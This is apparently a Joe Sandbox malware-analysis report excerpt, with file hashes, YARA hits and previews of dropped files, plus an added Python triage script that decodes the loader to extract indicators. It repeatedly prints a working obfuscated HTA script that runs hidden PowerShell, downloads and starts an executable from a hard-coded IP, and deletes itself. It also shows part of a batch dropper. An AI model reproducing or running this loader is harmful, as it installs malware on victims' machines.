                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\8tA3oGhlP.txt, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
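Analyst note on the dropped HTML/HTA files above (added triage example, not part of the Joe Sandbox report): every one of these 956-byte drops is the same file (MD5 B8B1EFFB8B550A10283923C32D0F4BDF). The script shrinks and moves the mshta window off-screen, hands a percent-encoded command to Wscript.Shell.Run with a hidden window, and then deletes its own file via document.location.href, which is why the artifact is gone by the time the host is examined. The Python below embeds a copy of the script body reconstructed from the Preview field (line breaks restored where the preview shows ".."; indentation is assumed), recovers the PowerShell one-liner with the same percent-decoding decodeURIComponent performs, and pulls out the download URL, the drop path and the self-delete behaviour as indicators. Regexes, field names and the file:/// assumption for the self-delete path are the example's own.

```python
"""Recover the loader hidden in the dropped HTA and extract its indicators.

Added triage example, not code from the sandbox report or the malware.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed from the report's Preview field: the same <script> body that
# JoeSecurity_Obshtml flagged in C:\Temp\.gif and C:\Temp\8tA3oGhlP.txt.
HTA_BODY = """<script>
try {
  moveTo(-100, -100);
  resizeTo(0, 0);
  var a = new ActiveXObject('Wscript.Shell');
  var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");
  a.Run(script, 0, false);
  var b = new ActiveXObject('Scripting.FileSystemObject');
  var p = document.location.href;
  p = unescape(p.substr(8));
  if (b.FileExists(p)) b.DeleteFile(p);
} catch (e) {}
close();
</script>
"""

# The string literal handed to decodeURIComponent(...) in the dropped script.
DECODE_CALL = re.compile(r'decodeURIComponent\(\s*"([^"]*)"\s*\)')
# Indicators to pull out of the recovered command line (example regexes).
URL_RE = re.compile(r"https?://[^\s'\"(),;]+")
DROP_PATH_RE = re.compile(r"\$env:temp\+'([^']+)'", re.IGNORECASE)


@dataclass
class LoaderIOCs:
    command: str                      # decoded PowerShell one-liner
    urls: list = field(default_factory=list)        # payload download URLs
    drop_paths: list = field(default_factory=list)  # where the payload lands
    hidden_window: bool = False       # -WindowStyle Hidden present
    self_deletes: bool = False        # script removes its own file


def decode_loader(hta_body: str) -> LoaderIOCs:
    """Decode the percent-encoded command and collect indicators from it."""
    m = DECODE_CALL.search(hta_body)
    if not m:
        raise ValueError("no decodeURIComponent(...) string literal found")
    # unquote() performs the same %XX -> byte -> UTF-8 decoding as the
    # JScript decodeURIComponent call the loader relies on.
    command = unquote(m.group(1))
    return LoaderIOCs(
        command=command,
        urls=URL_RE.findall(command),
        drop_paths=[f"%TEMP%{p}" for p in DROP_PATH_RE.findall(command)],
        hidden_window="-WindowStyle Hidden" in command,
        self_deletes="DeleteFile(" in hta_body,
    )


def self_delete_target(href: str) -> str:
    """Mirror `unescape(document.location.href.substr(8))` from the script.

    substr(8) drops exactly len("file:///") characters, so the script only
    resolves its own path when mshta opened it via a file:/// URL (assumed
    here); the result is the local path it then deletes.
    """
    return unquote(href[8:])


if __name__ == "__main__":
    iocs = decode_loader(HTA_BODY)
    print("command     :", iocs.command)
    print("urls        :", iocs.urls)
    print("drop paths  :", iocs.drop_paths)
    print("hidden      :", iocs.hidden_window)
    print("self-delete :", iocs.self_deletes)
    print("deletes     :", self_delete_target("file:///C:/Temp/.gif"))
```

Running it shows the recovered command is a hidden-window PowerShell download cradle: it writes the file fetched from the embedded URL into %TEMP% and launches it with Start-Process. The URL and drop path are the values to take into blocklists and EDR hunts; the self-delete logic explains why only the sandbox's dropped-file capture, not the disk, still holds the 956-byte script.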
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\NLqFjPikt.txt, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
Process:C:\Windows\SysWOW64\cmd.exe
File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:dropped
Size (bytes):956
Entropy (8bit):4.808412994473198
Encrypted:false
SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:false
Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
Process:C:\Windows\SysWOW64\cmd.exe
File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:dropped
Size (bytes):956
Entropy (8bit):4.808412994473198
Encrypted:false
SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\QZ7iCUD92.txt, Author: Joe Security
Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
Process:C:\Windows\System32\cmd.exe
File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:dropped
Size (bytes):956
Entropy (8bit):4.808412994473198
Encrypted:false
SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\random.hta, Author: Joe Security
Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
File Type:CSV text
Category:modified
Size (bytes):1058
Entropy (8bit):5.356262093008712
Encrypted:false
SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5:B2EFBF032531DD2913F648E75696B0FD
SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious:false
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
Category:dropped
Size (bytes):2798
Entropy (8bit):5.074542988652506
Encrypted:false
SSDEEP:48:EouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:/u4kGurX16HA3Ux6D9Dw1fQGObEQaO
MD5:D04672865C486B6AAD427C322064B30C
SHA1:23D3FD4C112365992E7D3E5E2A49B4C247C8A01D
SHA-256:BE97D5A0761863C214285693B8CE1938DF0FAD4AD4D2BDAB3667495EBCA2E826
SHA-512:28E6C968763EBEE2450ADDDEE9FA2A464C3499F7C9D6DE110C0CAB6F026A038BBA1A467D9842B9CA9FF92B726B760EE2D8758BF4C0B53D52F309A3AFAB7D3D09
Malicious:false
Preview:.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%64%%65%%6e%
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2013088
                                                                                                                                                                                                                        Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                        MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                        SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                        SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                        SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):50688
Entropy (8bit):5.493299313766064
Encrypted:false
SSDEEP:1536:5tVM5LJ25oHc0C+2TkA0fjmExIBbcN3EUrr:5t0J21mj6bcN3EUrr
MD5:18C31E671DEA37E27E89CA09A83B73D5
SHA1:31A7920C83DC371AFEE48098093E5BEDD4017290
SHA-256:2269441328D08D17CBBA18F7AEFE172128700D428AF38D209F3D1FE8D3FCBC3E
SHA-512:C6400F2FBD60B7E2DD8F5ADAF08347DD21487B7DB9B10EAC09AB2A7135789E2D36C3F63BFD117DA773B968EE8AB31226AEFCC944B5F59458760BF76D358CE676
Malicious:true
Yara Hits:
• Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Author: Joe Security
• Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 26%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:550686C0EE48C386DFCB40199BD076AC
SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1704448
Entropy (8bit):7.939378112820287
Encrypted:false
SSDEEP:49152:ACLkDxtWk5WtTj/JuiLWbUT5B+xLNNXTjbT+:RLkDxwk63/JVLqMS1fy
MD5:27998D2440B5A856ECA1795EABB8FA23
SHA1:62D063990224278662EBD3E54742C09C0ED74751
SHA-256:BB98AC0C1EF756EEE54726001008F52B498DD3C8575E190083674F52F33F3D9F
SHA-512:814EAB7721F0C0FDE983BF3956094847A1ED79E422AD8A6559A4A4266C9178D996B5341BE6CB20C2E62446001F89222E2D1F7AD7656EB793307AD9087B57A9BD
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 65%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:5FF1FCA37C466D6723EC67BE93B51442
SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
